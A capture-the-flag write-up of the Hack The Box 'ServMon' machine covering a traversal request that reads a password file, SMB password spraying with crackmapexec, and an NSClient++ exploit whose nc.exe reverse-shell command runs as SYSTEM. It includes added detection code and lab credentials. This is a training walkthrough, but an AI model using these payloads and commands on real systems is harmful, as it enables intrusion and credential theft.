
Hack The Box - ServMon Writeup


IP            OS       Difficulty  Release Date
10.10.10.184  Windows  Easy        11 April 2020

Enumeration

As with any machine on HackTheBox the first step is to run an nmap scan to find open ports and running services.

nmap

kali@kali:~$ nmap -sC -sV -T4 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 05:20 EDT

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:                                                                                                                 
|_http-title: Site doesn't have a title (text/html).                                                                            
135/tcp  open  msrpc         Microsoft Windows RPC                                                                              
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                                      
445/tcp  open  microsoft-ds?                                                                                                    
5666/tcp open  tcpwrapped                                                                                                       
6699/tcp open  tcpwrapped
8443/tcp open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.44 seconds

Working directory

While nmap is running we should create a directory to keep all of our files for this box organised. We can make a new folder on the desktop by running the command mkdir /home/kali/Desktop/ServMon. Any commands on the local machine will be run from this directory unless stated otherwise.

FTP

Anonymous login to FTP is allowed. Logging in with ftp 10.10.10.184 and the username anonymous shows a Users folder with folders Nathan and Nadine. There is a Confidential.txt file in Nadine that reveals there is a Passwords.txt file on Nathan's desktop.

HTTP

Navigating to the host in a browser reveals a login page for NVMS 1000.

searchsploit

Running NVMS through searchsploit (searchsploit nvms) reveals a directory traversal exploit. This could be used to grab the Passwords.txt file mentioned in Nadine's note.

NVMS-1000 Directory Traversal

The exploit entry (CVE-2019-20085) gives a proof of concept (POC) for reading files on the host.

POC

# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Grabbing Passwords.txt

Using Burp Suite it is possible to edit the request and grab the passwords file. Start the proxy and load the page; once the request has been intercepted, change the GET path to /../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt and forward the request, which loads the password file in the browser.
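The traversal above works because the server joins the request path onto its web root and lets every `..` segment walk upwards until the drive root is reached. The following added example (not code from NVMS-1000, from the exploit author, or from this writeup) contrasts that naive resolution with the check a server should perform, and adds a small access-log filter for the raw `..` sequences such requests leave behind. `WEBROOT` and the log lines are constructed for the demonstration; posixpath is used so it runs the same on any platform.

```python
"""Why the NVMS-1000 request above escapes the web root, and how a server
should resolve request paths instead.  Added example: not code from the
NVMS-1000 product, the exploit author, or the writeup.  WEBROOT and the
log lines are constructed for the demonstration."""
import posixpath
from typing import List, Optional
from urllib.parse import unquote

WEBROOT = "/srv/nvms/www"  # constructed; the real install path is not on the page


def naive_resolve(webroot: str, request_path: str) -> str:
    """What a vulnerable server effectively does: glue the request path onto
    the web root and let the filesystem honour every '..' segment.  A long
    enough run of '..' walks all the way to the root of the drive."""
    return posixpath.normpath(webroot + "/" + request_path.lstrip("/"))


def safe_resolve(webroot: str, request_path: str) -> Optional[str]:
    """Decode, normalise, then refuse anything that lands outside the root.
    Decoding twice catches '%252e' style double encoding; the decision is
    made on the final resolved path, not on whether '..' appears in the input."""
    decoded = unquote(unquote(request_path))
    root = posixpath.normpath(webroot)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


# Detection side: the traversal in the writeup is sent with Burp precisely
# because a browser collapses '/../' before sending, so a raw '..' sequence
# in an access log is a strong signal of a hand-crafted request.
TRAVERSAL_MARKERS = ("../", "..\\", "%2e%2e", "..%2f", "..%5c", "%252e%252e")


def flags_traversal(request_line: str) -> bool:
    """True when a logged request line carries a traversal sequence, encoded or not."""
    lowered = request_line.lower()
    return any(marker in lowered for marker in TRAVERSAL_MARKERS)


# Constructed access-log lines modelled on the requests described above.
LOG_LINES: List[str] = [
    '10.10.14.18 - - [20/Jun/2020:05:40:12 -0400] "GET /Pages/login.htm HTTP/1.1" 200 340',
    '10.10.14.18 - - [20/Jun/2020:05:41:03 -0400] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92',
    '10.10.14.18 - - [20/Jun/2020:05:42:47 -0400] "GET /../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 157',
    '10.10.14.18 - - [20/Jun/2020:05:43:10 -0400] "GET /%2e%2e/%2e%2e/windows/win.ini HTTP/1.1" 200 92',
]


def suspicious_requests(lines: List[str]) -> List[str]:
    """Return only the log lines a reviewer should look at."""
    return [line for line in lines if flags_traversal(line)]


if __name__ == "__main__":
    path = "/../../../../../../../../../../../../windows/win.ini"
    print("naive :", naive_resolve(WEBROOT, path))   # escapes to /windows/win.ini
    print("safe  :", safe_resolve(WEBROOT, path))    # None: rejected
    for line in suspicious_requests(LOG_LINES):
        print("ALERT :", line)
```

The point of `safe_resolve` is that it checks the resolved result rather than hunting for `..` in the input, so encoded variants and mixed separators are handled by construction; the log filter is the cheap complementary signal for the cases where the server was not fixed.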


The contents of this file are copied into a pass.txt file in the working directory.

pass.txt

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Get User

Using the passwords it is possible to gain access to the host. Password spraying is possible since the users nadine and nathan are known.

Password spraying

Using crackmapexec with the pass.txt file will spray the usernames and passwords and return any combinations that work.

kali@kali:~/Desktop/ServMon$ crackmapexec smb 10.10.10.184 -u nathan -p pass.txt 
SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE 
kali@kali:~/Desktop/ServMon$ crackmapexec smb 10.10.10.184 -u nadine -p pass.txt 
SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [+] SERVMON\nadine:L1k3B1gBut7s@W0rk 

nadine:L1k3B1gBut7s@W0rk is a valid combination.
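From the host's side, the run above is a burst of failed SMB logons from one source across two accounts, followed by a success. The following added example (not code from the writeup or from crackmapexec) shows the detection logic that catches that pattern: it counts failures per source inside a sliding window and reports which targeted accounts then logged on successfully from the same source. The event records are constructed, simplified extracts of Windows Security events 4625 (failed logon) and 4624 (successful logon), reduced to timestamp, event id, account and source address.

```python
"""Detecting the failed-logon burst that a password-guessing run leaves in
the Security log.  Added example, not code from the writeup or crackmapexec;
the records below are constructed, simplified extracts of Windows Security
events (4625 = failed logon, 4624 = successful logon)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

Event = Tuple[datetime, int, str, str]  # (time, event id, account, source ip)

# Constructed: ten failures from one source in 22 seconds across two accounts,
# then a success for nadine from the same source; plus one benign mistyped
# password from another workstation earlier in the hour.
RAW_EVENTS = """
2020-06-20T05:31:00 4625 nathan 10.10.14.18
2020-06-20T05:31:01 4625 nathan 10.10.14.18
2020-06-20T05:31:02 4625 nathan 10.10.14.18
2020-06-20T05:31:03 4625 nathan 10.10.14.18
2020-06-20T05:31:04 4625 nathan 10.10.14.18
2020-06-20T05:31:05 4625 nathan 10.10.14.18
2020-06-20T05:31:06 4625 nathan 10.10.14.18
2020-06-20T05:31:20 4625 nadine 10.10.14.18
2020-06-20T05:31:21 4625 nadine 10.10.14.18
2020-06-20T05:31:22 4625 nadine 10.10.14.18
2020-06-20T05:31:23 4624 nadine 10.10.14.18
2020-06-20T05:10:00 4625 nadine 10.10.10.50
2020-06-20T05:10:30 4624 nadine 10.10.10.50
"""


def parse_events(text: str) -> List[Event]:
    """Turn the simplified one-event-per-line text into typed tuples."""
    events: List[Event] = []
    for line in text.strip().splitlines():
        ts, event_id, account, source = line.split()
        events.append((datetime.fromisoformat(ts), int(event_id), account, source))
    return events


def spray_alerts(events: List[Event], threshold: int = 5,
                 window: timedelta = timedelta(minutes=5)) -> Dict[str, dict]:
    """One alert per source address whose failed logons reach `threshold`
    inside any `window`.  Each alert records the accounts targeted and which
    of them later logged on successfully from that source, the case that
    needs immediate attention rather than just a lockout policy."""
    by_source: Dict[str, List[Event]] = defaultdict(list)
    for ev in events:
        by_source[ev[3]].append(ev)

    alerts: Dict[str, dict] = {}
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e[0])
        failures = [e for e in evs if e[1] == 4625]
        # Sliding window: peak number of failures inside any `window`.
        peak, start = 0, 0
        for end in range(len(failures)):
            while failures[end][0] - failures[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if not failures or peak < threshold:
            continue
        first_failure = failures[0][0]
        alerts[source] = {
            "failures": peak,
            "accounts": sorted({e[2] for e in failures}),
            "success_after": sorted({e[2] for e in evs
                                     if e[1] == 4624 and e[0] >= first_failure}),
        }
    return alerts


if __name__ == "__main__":
    for source, detail in spray_alerts(parse_events(RAW_EVENTS)).items():
        print(source, detail)
```

Keying on the source address rather than on the account is what makes this catch both classic spraying (one password, many users) and the wordlist-per-user run shown above; the single mistyped password from 10.10.10.50 stays below the threshold and is not reported.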

SSH Login

The credentials found can be used to log in via SSH with ssh nadine@10.10.10.184, entering the password when prompted. The user.txt file can be found in the Desktop folder.

NSClient++

Navigating to https://10.10.10.184:8443 reveals a web app named NSClient++. The page opens to a password prompt. Selecting Forgotten Password? reveals a command that could be used to find the password.

Find password

Return to the open SSH session as nadine, change directory to C:\Program Files\NSClient++ and run nscp.exe web password --display, which reveals the password for the web app. The password is ew2x6SsGTxjRwXOT.


Attempting to log in

When trying to use the password an error is shown stating that login is not allowed. Looking at the configuration file in the NSClient++ directory shows that only clients from 127.0.0.1 are allowed access.

Open SSH tunnel

To connect as a localhost user an SSH tunnel can be opened with the command ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184, logging in with Nadine's password when prompted. Because the forwarded connection leaves the tunnel on the host itself, NSClient++ sees it arriving from 127.0.0.1 and the allowed-hosts restriction is satisfied. With the tunnel open, the web app can be accessed via https://127.0.0.1:8443 and the password will be accepted, allowing logon.

Privilege Escalation

Using this exploit it is possible to execute remote code. Since the NSClient++ application runs as nt authority\system it is possible to upload netcat onto the host and establish a reverse shell as administrator.

Download netcat

A working copy of nc.exe can be downloaded from this GitHub repo. This file is placed in the working directory once downloaded.

Host nc.exe

Navigating to the working directory and running the command python3 -m http.server will open a web server on port 8000. This will be used to transfer the netcat binary from the attacking kali machine to the host.

Download nc.exe on host

In the open SSH session as nadine switch to PowerShell by running powershell.exe. With a PowerShell session running the netcat file can be downloaded: cd to C:/Temp and run Invoke-WebRequest -Uri "http://10.10.14.18:8000/nc.exe" -OutFile nc.exe, changing the IP address to that of the attacking Kali machine.

Start a netcat listener

To receive the connection from the reverse shell a netcat listener must be opened. Open a new terminal window and run the command nc -nvlp 4455. Leave this window open and running as our connection will appear here once the exploit runs.

Exploiting NSClient++

With everything in place it is easy to run the exploit. First copy the exploit from the link above into a python script and set the file to executable with chmod +x script.py. Once the file is executable, run with the below command changing the IP address and port to match the netcat listener.

./script.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "c:/temp/nc.exe 10.10.14.18 4455 -e cmd.exe"

The exploit should run.

kali@kali:~/Desktop/ServMon$ ./script.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "c:/temp/nc.exe 10.10.14.18 4455 -e cmd.exe"
[!] Targeting base URL https://127.0.0.1:8443
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: sldqvLFSGsK)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .
[!] Timeout exceeded. Assuming your payload executed . . .

And after a few moments the netcat listener will open a reverse shell as nt authority\system.
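What the exploit leaves on the host is a process tree rooted at the NSClient++ service (nscp.exe, running as nt authority\system) with a shell and a network tool as descendants. External scripts are a legitimate NSClient++ feature, so the reliable detection is not "nscp.exe spawned a child" but "a shell or network tool has nscp.exe somewhere in its ancestry". The following added example (not code from the writeup or the NSClient++ project) walks constructed, simplified process-creation records of the kind Sysmon Event 1 or Windows Security 4688 provide and flags exactly that chain; the command lines and process ids are constructed, and the nadine SSH session is included as noise that must not be flagged.

```python
"""Detection: a shell or network tool running under the NSClient++ service.
Added example, not code from the writeup or the NSClient++ project.  The
records are constructed, simplified process-creation events whose field
names loosely follow Sysmon Event 1."""
from typing import Dict, List

PROCESS_EVENTS: List[dict] = [
    # The service itself (command line constructed, not taken from the page).
    {"ProcessId": 612, "ParentProcessId": 4,
     "Image": r"C:\Program Files\NSClient++\nscp.exe",
     "User": r"NT AUTHORITY\SYSTEM", "CommandLine": "nscp.exe (service)"},
    # The external script fires: cmd -> nc -> cmd, all as SYSTEM.
    {"ProcessId": 3320, "ParentProcessId": 612,
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": "cmd.exe /c c:/temp/nc.exe 10.10.14.18 4455 -e cmd.exe"},
    {"ProcessId": 3344, "ParentProcessId": 3320,
     "Image": r"C:\Temp\nc.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": "c:/temp/nc.exe 10.10.14.18 4455 -e cmd.exe"},
    {"ProcessId": 3360, "ParentProcessId": 3344,
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": "cmd.exe"},
    # Benign noise: nadine's interactive shell under sshd (constructed).
    {"ProcessId": 1200, "ParentProcessId": 800,
     "Image": r"C:\Program Files\OpenSSH\sshd.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": "sshd.exe"},
    {"ProcessId": 1990, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"SERVMON\nadine",
     "CommandLine": "cmd.exe"},
    {"ProcessId": 2108, "ParentProcessId": 1990,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"SERVMON\nadine", "CommandLine": "powershell.exe"},
]

# Images worth alerting on when they descend from the monitored service.
SHELL_OR_TOOL = {"cmd.exe", "powershell.exe", "pwsh.exe", "nc.exe", "ncat.exe"}
SERVICE_IMAGE = "nscp.exe"


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or forward-slash path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: Dict[int, dict]) -> List[dict]:
    """Walk parent links upward; stops at unknown pids or on a cycle."""
    chain: List[dict] = []
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ParentProcessId"]
    return chain


def find_service_spawned_shells(events: List[dict],
                                service_image: str = SERVICE_IMAGE) -> List[dict]:
    """Alert on every shell/tool process that has `service_image` as an ancestor."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts: List[dict] = []
    for e in events:
        if basename(e["Image"]) not in SHELL_OR_TOOL:
            continue
        chain = ancestry(e["ParentProcessId"], by_pid)
        if any(basename(a["Image"]) == service_image for a in chain):
            alerts.append({
                "pid": e["ProcessId"],
                "image": basename(e["Image"]),
                "user": e["User"],
                "via": [basename(a["Image"]) for a in chain],
            })
    return alerts


if __name__ == "__main__":
    for alert in find_service_spawned_shells(PROCESS_EVENTS):
        print("ALERT:", alert)
```

The walk up the parent chain is what keeps the rule both specific and robust: nadine's cmd.exe and powershell.exe under sshd are ignored, while the nested cmd.exe that nc.exe opens is still attributed to nscp.exe two hops up. Pairing this with an alert on any configuration change that enables the ExternalScripts module gives a second, earlier signal for the same technique.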


The root flag can be found in the Desktop folder of the Administrator user.

This post is licensed under CC BY 4.0 by the author.